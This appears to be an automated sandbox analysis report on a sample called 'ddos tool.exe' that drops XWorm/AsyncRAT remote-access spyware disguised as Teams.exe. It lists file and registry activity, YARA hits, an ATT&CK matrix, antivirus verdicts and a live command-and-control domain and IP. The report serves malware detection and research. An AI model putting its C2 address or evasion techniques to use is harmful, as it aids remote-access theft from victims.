                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllQueries volume information: C:\Users\user\AppData\Local\Temp\SystemUser.dll VolumeInformation
                  Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                  Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllQueries volume information: C:\Users\user\AppData\Local\Temp\SystemUser.dll VolumeInformation
                  Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                  Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ddos tool.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Teams.exe, 00000004.00000002.2944377412.000000001BA31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected XWorm
                  Source: Yara matchFile source: 4.0.Teams.exe.8d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000000.1997412009.00000000008D2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2933576803.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2938411155.0000000012B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Teams.exe PID: 3172, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Teams.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\SystemUser.dll, type: DROPPED

                  Remote Access Functionality

                  barindex
                  Yara detected XWorm
                  Source: Yara matchFile source: 4.0.Teams.exe.8d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000000.1997412009.00000000008D2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2933576803.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2938411155.0000000012B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Teams.exe PID: 3172, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Teams.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\SystemUser.dll, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		Valid Accounts12
                  Windows Management Instrumentation                  		1
                  Scripting                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		OS Credential Dumping1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job                  		1
                  DLL Side-Loading                  		11
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory33
                  System Information Discovery                  		Remote Desktop Protocol1
                  Screen Capture                  		1
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  PowerShell                  		1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		31
                  Obfuscated Files or Information                  		Security Account Manager551
                  Security Software Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron121
                  Registry Run Keys / Startup Folder                  		121
                  Registry Run Keys / Startup Folder                  		21
                  Software Packing                  		NTDS1
                  Process Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets161
                  Virtualization/Sandbox Evasion                  		SSHKeylogging12
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                  Masquerading                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Modify Registry                  		DCSync1
                  System Network Configuration Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job161
                  Virtualization/Sandbox Evasion                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                  Process Injection                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583946 Sample: ddos tool.exe Startdate: 03/01/2025 Architecture: WINDOWS Score: 100 54 responsibility-popular.gl.at.ply.gg 2->54 56 ip-api.com 2->56 64 Suricata IDS alerts for network traffic 2->64 66 Found malware configuration 2->66 68 Malicious sample detected (through community Yara rule) 2->68 70 18 other signatures 2->70 9 ddos tool.exe 4 2->9         started        12 SystemUser.dll 2->12         started        15 svchost.exe 2->15         started        18 3 other processes 2->18 signatures3 process4 dnsIp5 50 C:\Users\user\AppData\Local\Temp\Teams.exe, PE32 9->50 dropped 52 C:\Users\user\AppData\...\ddos tool.exe.log, CSV 9->52 dropped 20 Teams.exe 16 7 9->20         started        25 cmd.exe 1 9->25         started        82 Antivirus detection for dropped file 12->82 84 Multi AV Scanner detection for dropped file 12->84 86 Machine Learning detection for dropped file 12->86 62 127.0.0.1 unknown unknown 15->62 file6 signatures7 process8 dnsIp9 58 responsibility-popular.gl.at.ply.gg 147.185.221.24, 49941, 49983, 57012 SALSGIVERUS United States 20->58 60 ip-api.com 208.95.112.1, 49704, 80 TUT-ASUS United States 20->60 48 C:\Users\user\AppData\...\SystemUser.dll, PE32 20->48 dropped 72 Antivirus detection for dropped file 20->72 74 Multi AV Scanner detection for dropped file 20->74 76 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 20->76 78 8 other signatures 20->78 27 powershell.exe 23 20->27         started        30 powershell.exe 23 20->30         started        32 powershell.exe 20->32         started        36 2 other processes 20->36 34 conhost.exe 25->34         started        file10 signatures11 process12 signatures13 80 Loading BitLocker PowerShell Module 27->80 38 conhost.exe 27->38         started        40 conhost.exe 30->40         started        42 conhost.exe 32->42         started        44 conhost.exe 36->44         started        46 conhost.exe 36->46         started        process14

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  ddos tool.exe68%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                  ddos tool.exe100%AviraTR/Dropper.Gen
                  ddos tool.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\SystemUser.dll100%AviraTR/Spy.Gen
                  C:\Users\user\AppData\Local\Temp\Teams.exe100%AviraTR/Spy.Gen
                  C:\Users\user\AppData\Local\Temp\SystemUser.dll100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\Teams.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\SystemUser.dll79%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                  C:\Users\user\AppData\Local\Temp\Teams.exe79%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://crl.mY0%Avira URL Cloudsafe
                  responsibility-popular.gl.at.ply.gg100%Avira URL Cloudmalware
                  https://go.m0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ip-api.com
                  		208.95.112.1
                  		truefalse
                    		high
                    responsibility-popular.gl.at.ply.gg
                    		147.185.221.24
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      responsibility-popular.gl.at.ply.ggtrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://ip-api.com/line/?fields=hostingfalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://g.live.com/odclientsettings/Prod/C:edb.log.20.drfalse
                          		high
                          http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.2089377470.00000193C1010000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2166544814.000002801D6F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2312674461.00000296CE9D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2487883431.000002751006F000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.2359385006.000002750022B000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000005.00000002.2073386726.00000193B11C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2120023182.000002800D8A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222536178.00000296BEB89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2359385006.000002750022B000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.2359385006.000002750022B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.2073386726.00000193B11C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2120023182.000002800D8A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222536178.00000296BEB89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2359385006.000002750022B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/powershell.exe, 0000000D.00000002.2487883431.000002751006F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.2089377470.00000193C1010000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2166544814.000002801D6F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2312674461.00000296CE9D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2487883431.000002751006F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://crl.mYpowershell.exe, 0000000B.00000002.2331454415.00000296D7060000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://contoso.com/Licensepowershell.exe, 0000000D.00000002.2487883431.000002751006F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://ip-api.comTeams.exe, 00000004.00000002.2933576803.0000000002B81000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Iconpowershell.exe, 0000000D.00000002.2487883431.000002751006F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.ver)svchost.exe, 00000014.00000002.3251862994.0000021553600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000014.00000003.2647472347.0000021553380000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.20.dr, edb.log.20.drfalse
                                                  		high
